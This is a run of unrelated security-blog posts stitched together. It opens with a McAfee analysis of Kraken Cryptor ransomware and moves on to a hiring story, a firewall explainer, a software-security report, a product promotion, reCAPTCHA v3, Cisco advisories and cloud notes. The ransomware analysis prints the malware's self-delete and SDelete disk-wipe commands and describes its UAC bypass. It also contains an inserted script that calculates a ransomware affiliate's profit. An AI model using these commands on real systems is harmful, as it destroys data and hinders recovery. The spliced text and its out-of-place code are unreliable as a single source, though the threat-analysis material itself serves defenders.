Rising from the deep, Kraken Cryptor ransomware has had a notable development path in recent months. The first signs of Kraken came in mid-August on a popular underground forum. In mid-September it was reported that the malware developer had placed the ransomware, masquerading as a security solution, on the website SuperAntiSpyware, infecting systems that tried to download a legitimate version of the antispyware software.

Kraken’s presence became more apparent at the end of September, when the security researcher nao_sec discovered that the Fallout Exploit Kit, known for delivering GandCrab ransomware, also started to deliver Kraken.

The McAfee Advanced Threat Research team, working with the Insikt group from Recorded Future, found evidence of the Kraken authors asking the Fallout team to be added to the Exploit Kit. With this partnership, Kraken now has an additional malware delivery method for its criminal customers.

We also found that the user associated with Kraken ransomware, ThisWasKraken, has a paid account. Paid accounts are not uncommon on underground forums, but usually malware developers who offer services such as ransomware are highly trusted members and are vetted by other high-level forum members. Members with paid accounts are generally distrusted by the community.


Kraken Cryptor’s developers asking to join the Fallout Exploit Kit.

Kraken Cryptor announcement.

The ransomware was announced, in Russian, with the following features:

  • Encoded in C# (.NET 3.5)
  • Small stub size ~85KB
  • Fully autonomous
  • Collects system information as an encrypted message for reference
  • File size limit for encryption
  • Encryption speed faster than ever
  • Uses a hybrid combination of encryption algorithms (AES, RC4, Salsa20) for secure and fast encryption with a unique key for each file
  • Enables the use of a network resource and adds an expansion bypass mode for encrypting all files on non-OS disks
  • Is impossible to recover data using a recovery center or tools without payment
  • Added antidebug, antiforensic methods

Kraken works with an affiliate program, as do ransomware families such as GandCrab. This business scheme is often referred to as Ransomware-as-a-Service (RaaS).

Affiliates are given a new build of Kraken every 15 days to keep the payload fully undetectable by antimalware products. According to ThisWasKraken, when a victim asks for a free decryption test, the affiliate member should send one of the victim’s files with its associated unique key to the Kraken Cryptor ransomware support service. The service will decrypt the file and resend it to the affiliate member to forward to the victim. After the victim pays the full ransom, the affiliate member sends a percentage of the received payment to the RaaS developers to get a decryptor key, which is forwarded to the victim. This system ensures the affiliate pays a percentage to the affiliate program and does not simply pocket the full amount. The cut for the developers offers them a relatively safe way of making a profit without exposing themselves to the risk of spreading ransomware.

We have observed that the profit percentage for the developers has decreased from 25% in Version 1 to 20% in Version 2. The developers might have done this to attract more affiliates. To enter the program, potential affiliates must complete a form and pay $50 to be accepted.
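The affiliate economics described above can be checked with some quick arithmetic. The 25%/20% cuts and the $50 entry fee are figures from this post; the helper function itself is just illustrative:

```python
# What an affiliate keeps from a ransom payment after the developers'
# cut, net of the one-time $50 entry fee (illustrative arithmetic).
def affiliate_take(ransom_usd, dev_cut, entry_fee=50):
    return ransom_usd * (1 - dev_cut) - entry_fee

v1 = affiliate_take(1000, 0.25)  # Version 1: 25% developer cut -> 700.0
v2 = affiliate_take(1000, 0.20)  # Version 2: 20% developer cut -> 750.0
print(v1, v2)
```

On a $1,000 ransom the Version 2 terms leave the affiliate $50 more per payment, which is presumably the recruiting incentive.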

The Kraken forum post states that the ransomware cannot be used in the following countries:

  • Armenia
  • Azerbaijan
  • Belarus
  • Estonia
  • Georgia
  • Iran
  • Kazakhstan
  • Kyrgyzstan
  • Latvia
  • Lithuania
  • Moldova
  • Russia
  • Tajikistan
  • Turkmenistan
  • Ukraine
  • Uzbekistan

On October 21, Kraken’s authors released Version 2 of the affiliate program, reflecting the ransomware’s popularity and a fresh release. At the same time, the authors published a map showing the distribution of their victims:

Note that some of the countries on the developers’ exclusion list have infections.

Video promotions

The first public release of Kraken Cryptor was Version 1.2; the latest is Version 2.07. To promote the ransomware, the authors created a video showing its capabilities to potential customers. We analyzed the metadata of the video and believe the authors created it along with the first version, released in August.

In the video, the authors show how fast Kraken can encrypt data on the system:

Kraken ransomware in action.

Actor indications

The Advanced Threat Research team and Recorded Future’s Insikt group analyzed all the forum messages posted by ThisWasKraken. Based on the Russian language used in the posts, we believe ThisWasKraken is a native speaker of neither Russian nor English. To post in Russian, the actor likely uses an automated translation service, as suggested by the awkward phrasing. In contrast, the actor is noticeably more proficient in English, though they make consistent mistakes in both sentence structure and spelling. English spelling errors are also noticeable in the ransom note.

ThisWasKraken is likely part of a team that is not directly involved in the development of the ransomware. The actor’s role is customer facing, through the Jabber account thiswaskraken@exploit[.]im. Communications with ThisWasKraken show that the actor refers all technical issues to the product support team at teamxsupport@protonmail[.]com.


Bitcoin is the only currency the affiliate program uses. Insikt Group identified several wallets associated with the operation. Kraken’s developers appear to have chosen BitcoinPenguin, an online gambling site, as their primary money laundering conduit. It is very uncommon for criminal actors, and specifically ransomware operators, to bypass traditional cryptocurrency exchangers when laundering stolen funds. One of the decisive factors in this unusual choice was likely that BitcoinPenguin does not require identity verification from its members, allowing anyone to maintain an anonymous cryptocurrency wallet.

Although cryptocurrency exchangers continue to tighten their registration rules in response to regulatory demands, online crypto casinos do not have to follow the same know-your-customer guidelines, providing a convenient loophole for all kinds of money launderers.

Bitcoin transactions associated with Kraken analyzed with the Crystal blockchain tool. The parent Bitcoin wallet is 3MsZjBte81dvSukeNHjmEGxKSv6YWZpphH.

Kraken Cryptor at work

The ransomware encrypts data on the disk very quickly and uses external tools, such as SDelete from the Sysinternals suite, to wipe files and make file recovery harder.

The Kraken Cryptor infection scheme.

The ransomware has implemented a user account control (UAC) bypass using the Windows Event Viewer. This bypass technique is used by other malware families and is quite effective for executing malware.

The technique is well explained in an article by blogger enigma0x3.

We analyzed an early subset of Kraken ransomware samples and determined they were still in the testing phase, adding and removing options. The ransomware has implemented a “protection” to delete itself during the infection phase:

"C:\Windows\System32\cmd.exe" /C ping -n 3 > NUL&&del /Q /F /S "C:\Users\Administrator\AppData\Local\Temp\krakentemp0000.exe"

This step is to prevent researchers and endpoint protections from catching the file on an infected machine.

Kraken encrypts user files with a random name and drops a ransom note demanding that the victim pay to recover them. McAfee recommends not paying ransoms, because doing so contributes to the development of more ransomware families.

Kraken’s ransom note.

Each file extension is different; this technique is often used by specific ransomware families to bypass endpoint protection systems.

Kraken delivered by the exploit kit bypasses the UAC using Event Viewer, drops a file on the system, and executes it through the UAC bypass method.

The binary delivered by the exploit kit.

During compilation of the first versions, the authors of the binary forgot to delete the PDB reference, revealing the file’s relationship with Kraken Cryptor:

The early versions contained the following path:


Later versions dropped the PDB path together with the Kraken loader.

Using SysInternals tools

One unique feature of this ransomware family is the use of SDelete. Kraken uses a .bat file to perform certain operations, making file recovery much more challenging:

Kraken downloads SDelete from the Sysinternals website, adds the registry key accepting the EULA to avoid the pop-up, and executes it with the following arguments:

sdelete.exe -c -z C

The SDelete batch file makes file recovery much harder by overwriting all free space on the drive with zeros, deleting the Volume Shadow Copies, disabling the recovery reboot option, and finally rebooting the system after 300 seconds.

Netguid comparison

The earlier versions of Kraken were delivered by a loader before it moved to a direct execution method. The loader we examined contained a specific netguid. With this, we found additional samples of the Kraken loader on VirusTotal:

Not only did the loader have a specific netguid; the compiled versions of Kraken also shared a netguid, making it possible to continue hunting for samples:

Comparing versions

Kraken uses a configuration file in every version to set the variables for the ransomware. This file is easily extracted for additional analysis.

Based on the config file we have discovered nine versions of Kraken:

  • 1.2
  • 1.3
  • 1.5
  • 1.5.2
  • 1.5.3
  • 1.6
  • 2.0
  • 2.0.4
  • 2.0.7

By extracting the config files from all the versions, we built the following overview of features. (The √ means the feature is present.)

The versions we examined mostly contain the same options; only some of them change the anti-virtual-machine protection and antiforensic capabilities. The latest version, Kraken 2.0.7, changed its configuration scheme. We will cover that later in this article.

Other differences in Kraken’s config file include the list of countries excluded from encryption. The standouts are Brazil and Syria, which were not named in the original forum advertisement.

Having an exclusion list is a common method used by cybercriminals to avoid prosecution. Brazil’s addition to the list in Version 1.5 suggests the involvement of a Brazilian affiliate. The following table shows the exclusion list by country and version. (The √ means the country appears on the list.)

All the Kraken releases have excluded the same countries, except for Brazil, Iran, and Syria.

Regarding Syria: We believe that the Kraken actors have had the same change of heart as the actors behind GandCrab, who recently released decryption keys for Syrian victims after a tweet claimed they had no money to pay the ransoms.


GandCrab’s change of heart regarding Syrian victims.

Version 2.0.7

The most recent version we examined comes with a different configuration scheme:

This release has more options. We expect this malware will be more configurable than other active versions.

APIs and statistics

One of the new features is a public API to track the number of victims:

Public API to track the number of victims. Source: Bleeping Computer.

Another API is a hidden service to track certain statistics:


The Onion URL can be found easily in the binary:

The endpoint and browser Kraken uses is hardcoded in the config file:

Kraken gathers the following information from every infection:

  • Status
  • Operating system
  • Username
  • Hardware ID
  • IP address
  • Country
  • City
  • Language
  • HDCount
  • HDType
  • HDName
  • HDFull
  • HDFree
  • Privilege
  • Operate
  • Beta

Kraken infrastructure

In Versions 1.2 through 2.04, Kraken contacts blasze[.]tk to download additional files. The site has Cloudflare protection to mitigate DDoS attacks:

The domain is not accessible from many countries:


McAfee coverage

McAfee detects this threat with the following signatures:

  • Artemis!09D3BD874D9A
  • Artemis!475A697872CA
  • Artemis!71F510C40FE5
  • Artemis!99829D5483EF
  • Artemis!CE7606CFDFC0
  • Artemis!F1EE32E471A4
  • RDN/Generic.dx
  • RDN/Generic.tfr
  • RDN/Ransom

Indicators of compromise

Kraken loader hashes

  • 564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd
  • 53a28d3d29e655deca6702c98e71a9bd52a5a6de05524234ab362d27bd71a543

Kraken ransomware samples hashes

  • 047de76c965b9cf4a8671185d889438e4b6150326802e87470d20a3390aad304
  • 0b6cd05bee398bac0000e9d7032713ae2de6b85fe1455d6847578e9c5462391f
  • 159b392ec2c052a26d6718848338011a3733c870f4bf324863901ec9fbbbd635
  • 180406f298e45f66e205bdfb2fa3d8f6ead046feb57714698bdc665548bebc95
  • 1d7251ca0b60231a7dbdbb52c28709a6533dcfc4a339f4512955897c7bb1b009
  • 2467d42a4bdf74147ea14d99ef51774fec993eaef3c11694125a3ced09e85256
  • 2b2607c435b76bca395e4ef4e2a1cae13fe0f56cabfc54ee3327a402c4ee6d6f
  • 2f5dec0a8e1da5f23b818d48efb0b9b7065023d67c617a78cd8b14808a79c0dc
  • 469f89209d7d8cc0188654e3734fba13766b6d9723028b4d9a8523100642a28a
  • 4f13652f5ec4455614f222d0c67a05bb01b814d134a42584c3f4aa77adbe03d0
  • 564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd
  • 61396539d9392ae08b2c9836dd19a58efb541cf0381ea6fef28637aae63084ed
  • 67db0f639d5f4c021efa9c2b1db3b3bc85b2db920859dbded5fed661cc81282d
  • 713afc925973a421ff9328ff02c80d38575fbadaf27a1db0063b3a83813e8484
  • 7260452e6bd05725074ba92b9dc8734aec12bbf4bbaacd43eea9c8bbe591be27
  • 7747587608db6c10464777bd26e1abf02b858ef0643ad9db8134e0f727c0cd66
  • 7e0ee0e707db426eaf25bd0924631db969bb03dd9b13addffbcc33311a3b9aa7
  • 7fb597d2c8ed8726b9a982b2a84d1c9cc2af65345588d42dd50c8cebeee03dff
  • 85c75ac7af9cac6e2d6253d7df7a0c0eec6bdd71120218caeaf684da65b786be
  • 8a0320f3fee187040b1922c6e8bdf5d6bacf94e01b90d65e0c93f01e2abd1e0e
  • 97ed99508e2fae0866ad0d5c86932b4df2486da59fc2568fb9a7a4ac0ecf414d
  • 9c88c66f44eba049dcf45204315aaf8ba1e660822f9e97aec51b1c305f5fdf14
  • a33dab6d7adb83691bd14c88d7ef47fa0e5417fec691c874e5dd3918f7629215
  • b639e26a0f0354515870ee167ae46fdd9698c2f0d405ad8838e2e024eb282e39
  • cae152c9d91c26c1b052c82642670dfb343ce00004fe0ca5d9ebb4560c64703b
  • d316611df4b9b68d71a04ca517dbd94615a77a87f7a8c270d100ef9729a4e122
  • e39d5f664217bda0d95d126cff58ba707d623a58a750b53c580d447581f15af6
  • f7179fcff00c0ec909b615c34e5a5c145fedf8d9a09ed04376988699be9cc6d5
  • f95e74edc7ca3f09b582a7734ad7a547faeb0ccc9a3370ec58b9a27a1a6fd4a7
  • fea3023f06d0903a05096f1c9fc7113bea50b9923a3c024a14120337531180cd
  • ff556442e2cc274a4a84ab968006350baf9897fffd680312c02825cc53b9f455


  • 83b7ed1a0468394fc9661d07b9ad1b787f5e5a85512ae613f2a04a7442f21587
  • b821eb60f212f58b4525807235f711f11e2ef285630604534c103df74e3da81a
  • 0c4e0359c47a38e55d427894cc0657f2f73136cde9763bbafae37c916cebdd2a


  • f34d5f2d4577ed6d9ceec516c1f5a744


  • thiswaskraken@exploit[.]im

Email addresses found in the binaries and configuration files

  • BM-2cUEkUQXNffBg89VwtZi4twYiMomAFzy6o@bitmessage(.)ch
  • BM-2cWdhn4f5UyMvruDBGs5bK77NsCFALMJkR@bitmessage(.)ch
  • nikolatesla@cock(.)li
  • nikolateslaproton@protonmail(.)com
  • oemfnwdk838r@mailfence(.)com
  • onionhelp@memeware(.)net
  • powerhacker03@hotmail(.)com
  • shfwhr2ddwejwkej@tutanota(.)com
  • shortmangnet@420blaze(.)it
  • teamxsupport@protonmail[.]com

Bitcoin address

  • 3MsZjBte81dvSukeNHjmEGxKSv6YWZpphH

PDBs found in the loader samples

  • C:\Users\Krypton\source\repos\UAC\UAC\obj\\Release\UAC.pdb

Associated Filenames

  • C:\ProgramData\Safe.exe
  • C:\ProgramData\EventLog.txt
  • # How to Decrypt Files.html
  • Kraken.exe
  • Krakenc.exe
  • Release.bat
  • <random>.bat
  • Sdelete.exe
  • Sdelete64.exe
  • <random>.exe
  • CabXXXX.exe
  • TarXXXX.exe
  • SUPERAntiSpywares.exe
  • KrakenCryptor.exe
  • 73a94429b321dfc_QiMAWc2K2W.exe
  • auService.exe
  • file.exe
  • bbdefac4e59207._exe
  • Build.exe

Ransomware demo version


Kraken Unique Key

MITRE ATT&CK™ techniques

  • Data compressed
  • Email collection
  • File and directory
  • File deletion
  • Hooking
  • Kernel modules and extensions
  • Modify registry
  • Process injection
  • Query registry
  • Remote system
  • Security software
  • Service execution
  • System information
  • System time

Yara rules

The McAfee Advanced Threat Research team created Yara rules to detect the Kraken ransomware. The rules are available on our Github repository.


The post Fallout Exploit Kit Releases the Kraken Ransomware on Its Victims appeared first on McAfee Blogs.

Returning to Work? Make it McAfee!

By: Vera, Software Developer

After nine years out of the workplace, I was ready to return to software development. The idea was challenging at first. Would my skills still be valued? Which company would be right for me?

To prepare, I attended seminars and technology deep-dives for people looking to return to software development work. McAfee offered a 12-week, full-time, compensation-based experience program which I was delighted to accept. Designed to help people successfully re-integrate into the workplace after time away, it’s part of McAfee’s strategy to help fill the cybersecurity skills gap and encourage diversity in the technology sector.

Everyone I spoke with at McAfee impressed me as they shared their roles and experiences with the company. I really liked the support, guidance and resources McAfee offered applicants—it gave me the confidence I needed to step back into work. It was clear McAfee would be the perfect starting point for me, my natural first choice when returning to work.

Part of the Team and Learning Fast

Joining McAfee’s Web Security Research software development group in Cork, Ireland, I felt welcome and part of the team from Day One. The culture is inclusive, and creativity and new ideas are encouraged.

Nine years out of practice and with experience in Java-based software, but none in cybersecurity, I had much to learn. I loved the way everyone in my team was always ready to help and support me.

The team uses the scrum development approach, with members collaborating extensively on tasks in two-week sprints. We also use pair programming.

Scrum and pair programming were both new to me, but I quickly gained a comprehensive understanding of the technologies, techniques and tools as we bounced ideas off one another and addressed challenges together. It was great to develop skills and re-integrate with the workplace so rapidly.

I learned not only about security and McAfee’s solutions, but also about the Linux platforms they run on. I hadn’t done any Unix work since my graduate days, but the team provided support and advice whenever I needed it.

Make the Most of Your Placement

I’d recommend McAfee to anyone looking to return to the workplace. The company has been a great employer and a fantastic way to restart my career. Here are my top five tips for getting the most out of returning to work.

1. Do Your Homework
It’s important to find the right fit for you and your skills. Speak to team members to discover what the company is like, and the products, processes and technologies you’ll be working with.

2. Go Ahead – Apply!
Believe in yourself. You’ve had a good career and responsibilities in the past and your knowledge hasn’t evaporated. You can do even more in the future—I can attest to that. Wherever your next opportunity is, make sure it’s the perfect place to acquire skills and knowledge you may have missed during your time away.

3. Build Your Skills
Expand your expertise through Return to Work seminars and other resources. Review current technologies and thinking. Expand your capabilities and confidence!

4. Extend Your Network
Before and during your time at your placement company, develop connections with relevant people in your team, and in the industry as a whole.

5. Ask Questions
McAfee operates from a foundation of trust and respect. Questions get answers that support progress and development. If you don’t know, ask, either in your team or in your personal development sessions, an integral part of the program.

If you’re apprehensive, don’t worry – that’s normal! I was unsure when I first considered returning to work, especially after such a long break, but now I’m delighted to be back, and even more so to be working with McAfee in a permanent, full-time role.

It’s great to be part of a company that recognizes the capabilities of people who took time out of the workplace, investing time and resources to help us get that all-important foot back in the door. I didn’t know I could do it – now I know I can!

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

Interested in learning more about a career at McAfee? Apply here!

The post Returning to Work? Make it McAfee! appeared first on McAfee Blogs.

What is a firewall? How they work and all about next-generation firewalls

A firewall is a network device that monitors packets going in and out of networks and blocks or allows them according to rules that have been set up to define what traffic is permissible and what traffic isn’t.

There are several types of firewalls that have developed over the years, becoming progressively more complex and taking more parameters into consideration when determining whether traffic should be allowed to pass. The most modern are commonly known as next-generation firewalls (NGFW) and incorporate many other technologies beyond packet filtering.

Initially placed at the boundaries between trusted and untrusted networks, firewalls are now also deployed to protect internal segments of networks, such as data centers, from other segments of organizations’ networks.
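To make the rule-evaluation idea concrete, here is a toy first-match packet filter. The rule format is hypothetical and deliberately minimal; real firewalls match on many more fields (source addresses, connection state, zones, applications, users):

```python
# Toy first-match packet filter with an implicit default-deny posture.
from typing import NamedTuple, Optional

class Rule(NamedTuple):
    action: str                 # "allow" or "block"
    proto: Optional[str]        # None matches any protocol
    dst_port: Optional[int]     # None matches any destination port

RULES = [
    Rule("allow", "tcp", 443),  # permit HTTPS
    Rule("allow", "udp", 53),   # permit DNS
    Rule("block", None, None),  # explicit catch-all deny
]

def evaluate(proto: str, dst_port: int) -> str:
    """Return the action of the first matching rule (default deny)."""
    for rule in RULES:
        if rule.proto in (None, proto) and rule.dst_port in (None, dst_port):
            return rule.action
    return "block"

print(evaluate("tcp", 443), evaluate("tcp", 23))  # allow block
```

First-match ordering matters: moving the catch-all deny to the top would block everything, which is why rule ordering is a classic source of firewall misconfiguration.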


State of Software Security Volume 9: Top 5 Takeaways for CISOs

We’ve just released the 9th volume of our State of Software Security report and, as always, it’s a treasure trove of valuable security insights. This year’s report analyzes our scans of more than 2 trillion lines of code, all performed over a 12-month period between April 1, 2017 and April 30, 2018. The data reveals a clear picture of both the security of code organizations are producing today, plus how organizations are working to lower their risk from software vulnerabilities. There are many significant and actionable takeaways, but we’ve pulled out what we consider the top 5 for security professionals.

1. Most code is still rife with vulnerabilities

More than 85 percent of all applications have at least one vulnerability in them; more than 13 percent of applications have at least one very high severity flaw. Clearly, we’ve got work to do. Most organizations are leaving themselves open to attack, and we need to focus on and keep at the application security problem.

2. The usual suspects continue to plague code security

We continue to see the same vulnerabilities pop up in code year after year. The majority of applications this year suffered from information leakage, cryptographic problems, poor code quality, and CRLF Injection. Other heavy-hitters also showed up in statistically significant populations of software. For example, we discovered highly exploitable Cross-Site Scripting flaws in nearly 49 percent of applications, and SQL injection appeared nearly as much as ever, showing up in almost 28 percent of tested software.

Why do these same vulnerabilities continue to emerge year in and year out? Most likely several factors are coming into play, but developer education clearly plays a big role. Veracode recently sponsored the 2017 DevSecOps Global Skills Survey and found that less than one in four developers or other IT pros were required to take a single college course on security. Meanwhile, once developers get on the job, employers aren't advancing their security training options, either. Approximately 68 percent of developers and IT pros say their organizations don't provide them adequate training in application security.

3. It’s taking organizations a long time to address most of their flaws

Finding flaws is one thing; fixing them is another. The true measure of AppSec success is the percentage of found flaws you are remediating or mitigating. This year, we took a detailed look at our data surrounding fix rates, and unearthed some troubling, and some promising, findings.

One week after first discovery, organizations close out only about 15 percent of vulnerabilities. In the first month, that closure reaches just under 30 percent. By the three-month mark, organizations haven't even made it halfway, closing only a little more than 45 percent of all flaws. Overall, one in four vulnerabilities remain open well over a year after first discovery.

Why does that slow fix rate matter? Because cyberattackers move fast. If you’ve discovered a flaw, chances are, the bad guys have too. And the time it takes for attackers to come up with exploits for newly discovered vulnerabilities is measured in hours or days. A big window between find and fix leaves a big security risk.

4. The volume of vulnerabilities means prioritization is king

Clearly, most code contains a significant number of security-related defects. And also clearly, fixing those defects is not a simple or quick task. Therefore, prioritization rules in application security today. And this year’s data shows that, although organizations are prioritizing their flaws, they aren’t always considering all the important variables. Most are prioritizing by severity of flaw, but not considering criticality or exploitability.

This is a big deal when you consider that a low severity information leakage flaw could provide just the right amount of system knowledge an attacker needs to leverage a vulnerability that might otherwise be difficult to exploit. Or a low severity credentials management flaw, which might not be considered very dangerous, could hand attackers the keys to an account that could be used to exploit more serious flaws elsewhere in the software.

The bottom line is that organizations need to start thinking more critically about the factors that impact what they fix first.

5. DevSecOps practices are moving the needle on AppSec

In the good news department, this year’s data shows that customers taking advantage of DevSecOps’ continuous software delivery are closing their vulnerabilities more quickly than the typical organization.

What’s the connection? It stems from the incrementalism at the heart of DevOps, which emphasizes deploying small, frequent software builds. Working this way makes it easier to deliver gradual improvements to all aspects of the application. When organizations embrace DevSecOps, they embed security checks into those ongoing builds, folding continuous improvement of the application’s security posture in alongside feature improvement.

Over the past three years, we've examined scanning frequency as a bellwether for the prevalence of DevSecOps adoption in our customer base. Our hypothesis is that the more frequently organizations are scanning their software, the more likely it is that they’re engaging in DevSecOps practices. And this year’s data shows that there is a very strong correlation between how many times in a year an organization scans and how quickly they address their vulnerabilities.

When apps are tested fewer than three times a year, flaws persist more than 3.5x longer than when organizations can bump that up to seven to 12 scans annually. Organizations really start to take a bite out of risk when they increase frequency beyond that. Each step up in scan rate results in shorter and shorter flaw persistence intervals. Once organizations are scanning more than 300 times per year, they're able to shorten flaw persistence 11.5x across the intervals compared to applications that are only scanned one to three times per year.

Get the full report

Read the full SoSS report to get all the software security insights and best practices from our scan data. This year’s report contains details on the above points, plus data and insights on specific vulnerability types, the security implications of programming language choice, which industries are more secure than others, and more.

Heimdal Security’s Thor Foresight Enterprise, now available in Microsoft Azure Marketplace and AppSource

Thor Foresight Enterprise, the endpoint security product previously known as Heimdal CORP, is now available in Microsoft Azure Marketplace and AppSource, the platform where customers can find line-of-business apps for their industry.

This is a great addition for all Microsoft customers, who can now benefit from a cost-effective and modular endpoint solution that features EDR and other essential threat hunting tools.

Thor Foresight Enterprise is based on unique traffic-based malware detection capabilities that make it possible to map out the critical endpoints in the business environment.      

The company has migrated its offer from Microsoft’s internal partner catalog to the cloud marketplace, which is an excellent selling tool and a great way to accelerate business growth.

The cloud marketplace can also provide more opportunities for Heimdal Security to expand its security solutions and attract even more customers across different global regions. 

Achieve proactive security and enhance your existing solution with Thor Foresight Enterprise, the Next-Gen Threat Prevention suite for your endpoints. 

Advanced malware is specially created to bypass traditional antivirus detection and can sneak through the gaps, but, with Thor Foresight Enterprise’s proactive, not just reactive approach, your endpoints and networks will remain secure. 

The proprietary DarkLayer Guard feature brings unique traffic filtering to prevent endpoint compromise, block malicious Internet traffic and eliminate the risk of data leakage.   

Using machine learning technology to adapt to evolving threats, the VectorN Detection module will block all incoming and outgoing communications to malicious servers and networks.  

With the powerful X-Ploit Resilience feature, Thor Foresight Enterprise will automatically apply available updates for software apps, eliminating security holes in third-party software. This way, the vulnerabilities commonly targeted during attacks are eliminated automatically, adding cost-effective resilience to the enterprise. 

“With Heimdal Security publishing its solutions in the Microsoft AppSource and Azure Marketplace, we mark an important milestone to be replicated across the partner ecosystem, that contributes to the new era where Microsoft is increasingly becoming the channel for its partners,” said Radu Stefan, Microsoft ISV Business Development Manager for Heimdal Security.

Heimdal Security’s Thor Foresight Enterprise, winner of Anti Malware Solution of the Year at Computing Security Awards 2018, is a revolutionary approach to endpoint security.

Uniquely built to combat next-gen malware, ransomware, and other enterprise threats, it provides both the opportunity to automate vulnerability management and essential threat hunting tools like EDR, while being fully compatible with existing enterprise solutions.

For more information about Heimdal Security or to speak to our specialists about THOR Enterprise, please contact us by emailing sales (at) heimdalsecurity (dot) com or calling +45 7199 9177. 

The post Heimdal Security’s Thor Foresight Enterprise, now available in Microsoft Azure Marketplace and AppSource appeared first on Heimdal Security Blog.

Introducing reCAPTCHA v3: the new way to stop bots

[Cross-posted from the Google Webmaster Central Blog]

Today, we’re excited to introduce reCAPTCHA v3, our newest API that helps you detect abusive traffic on your website without user interaction. Instead of showing a CAPTCHA challenge, reCAPTCHA v3 returns a score so you can choose the most appropriate action for your website.

A frictionless user experience

Over the last decade, reCAPTCHA has continuously evolved its technology. In reCAPTCHA v1, every user was asked to pass a challenge by reading distorted text and typing into a box. To improve both user experience and security, we introduced reCAPTCHA v2 and began to use many other signals to determine whether a request came from a human or bot. This enabled reCAPTCHA challenges to move from a dominant to a secondary role in detecting abuse, letting about half of users pass with a single click. Now with reCAPTCHA v3, we are fundamentally changing how sites can test for human vs. bot activities by returning a score to tell you how suspicious an interaction is and eliminating the need to interrupt users with challenges at all. reCAPTCHA v3 runs adaptive risk analysis in the background to alert you of suspicious traffic while letting your human users enjoy a frictionless experience on your site.

More Accurate Bot Detection with "Actions"

In reCAPTCHA v3, we are introducing a new concept called “Action”—a tag that you can use to define the key steps of your user journey and enable reCAPTCHA to run its risk analysis in context. Since reCAPTCHA v3 doesn't interrupt users, we recommend adding reCAPTCHA v3 to multiple pages. In this way, the reCAPTCHA adaptive risk analysis engine can identify the pattern of attackers more accurately by looking at the activities across different pages on your website. In the reCAPTCHA admin console, you can get a full overview of reCAPTCHA score distribution and a breakdown for the stats of the top 10 actions on your site, to help you identify which exact pages are being targeted by bots and how suspicious the traffic was on those pages.

Fighting bots your way

Another big benefit that you’ll get from reCAPTCHA v3 is the flexibility to prevent spam and abuse in the way that best fits your website. Previously, the reCAPTCHA system mostly decided when and what CAPTCHAs to serve to users, leaving you with limited influence over your website’s user experience. Now, reCAPTCHA v3 will provide you with a score that tells you how suspicious an interaction is. There are three potential ways you can use the score. First, you can set a threshold that determines when a user is let through or when further verification needs to be done, for example, using two-factor authentication and phone verification. Second, you can combine the score with your own signals that reCAPTCHA can’t access—such as user profiles or transaction histories. Third, you can use the reCAPTCHA score as one of the signals to train your machine learning model to fight abuse. By providing you with these new ways to customize the actions that occur for different types of traffic, this new version lets you protect your site against bots and improve your user experience based on your website’s specific needs.
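As a minimal sketch of the first option, the mapping below turns a score into an action. The 0.5 and 0.1 cutoffs are illustrative assumptions to tune for your own traffic, not official recommendations:

```c
#include <assert.h>

/* Possible dispositions for a scored request. */
typedef enum { ACTION_ALLOW, ACTION_VERIFY, ACTION_BLOCK } risk_action;

/* Map a reCAPTCHA v3 score (0.0 = likely bot, 1.0 = likely human) onto an
   action. The 0.5 and 0.1 thresholds are illustrative assumptions. */
risk_action score_to_action(double score)
{
    if (score >= 0.5)
        return ACTION_ALLOW;    /* let the request through */
    if (score >= 0.1)
        return ACTION_VERIFY;   /* step up: e.g. 2FA or phone verification */
    return ACTION_BLOCK;        /* treat as abusive traffic */
}
```

The same score could equally be combined with your own signals or fed into a machine learning model, as described above.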

In short, reCAPTCHA v3 helps to protect your sites without user friction and gives you more power to decide what to do in risky situations. As always, we are working every day to stay ahead of attackers and keep the Internet easy and safe to use (except for bots).

Ready to get started with reCAPTCHA v3? Visit our developer site for more details.

Cisco Advanced Malware Protection for Endpoints on Windows DLL Preloading Vulnerability

A vulnerability in the DLL loading component of Cisco Advanced Malware Protection (AMP) for Endpoints on Windows could allow an authenticated, local attacker to disable system scanning services or take other actions to prevent detection of unauthorized intrusions. To exploit this vulnerability, the attacker would need to have administrative credentials on the Windows system.

The vulnerability is due to the improper validation of resources loaded by a system process at run time. An attacker could exploit this vulnerability by crafting a malicious DLL file and placing it in a specific location on the targeted system. A successful exploit could allow the attacker to disable the targeted system's scanning services and ultimately prevent the system from being protected from further intrusion.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:

Security Impact Rating: Medium
CVE: CVE-2018-15452

Cisco Prime File Upload Servlet Path Traversal and Remote Code Execution Vulnerability

A vulnerability in the Cisco Prime File Upload servlet affecting multiple Cisco products could allow a remote attacker to upload arbitrary files to any directory of a vulnerable device and execute those files.

For more information about this vulnerability per Cisco product, see the Details section of this security advisory.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
Security Impact Rating: Critical
CVE: CVE-2018-0258

DisruptOps: The 4 Phases to Automating Cloud Management

A Security Pro’s Cloud Automation Journey

Catch me at a conference and the odds are you will overhear my saying “cloud security starts with architecture and ends with automation.” I quickly follow with how important it is to adopt a cloud native mindset, even when you’re bogged down with the realities of an ugly lift and shift before the data center contract ends and you turn the lights off. While that’s a nice quip, it doesn’t really capture anything about how I went from a meat and potatoes (firewall and patch management) kind of security pro to an architecture and automation cloud native. Rather than preaching from the mount, I find it more useful to describe my personal journey and my technical realizations along the way. If you’re a security pro, or someone trying to up-skill a security pro for cloud, odds are you will end up on a very similar path.

Read the full post at DisruptOps

- Rich

DAM Not Moving to the Cloud

Posted under: Incite

I have concluded that nobody is using Database Activity Monitoring (DAM) in public Infrastructure or Platform as a Service. I never see it in any of the cloud migrations we assist with. Clients don’t ask about how to deploy it or if they need to close this gap. I do not hear stories, good or bad, about its usage. Not that DAM cannot be used in the cloud, but it is not.

There are certainly some reasons firms invest security time and resources elsewhere. What comes to mind are the following:

  1. PaaS and use of Relational: There are a couple of trends which I think come into play. First, while user installed and managed relational databases do happen, there is a definite trend towards adopting RDBMS as a Service. If customers do install their own relational platform, it’s MySQL or MariaDB, for which (so far as I know) there are few monitoring options. Second, for most new software projects, a relational database is a much less likely choice to back applications – more often it’s a NoSQL platform like Mongo (self-managed) or something like Dynamo. This has reduced the total relational footprint.

  2. CI/CD: Automated build and security test pipelines – we see a lot more application and database security testing in development and quality assurance phases, prior to production deployment. Many potential code vulnerabilities and common SQL injection attacks are being spotted and addressed prior to applications being deployed. And there may not be a lot of reconfiguration in production if your installation is defined in software.

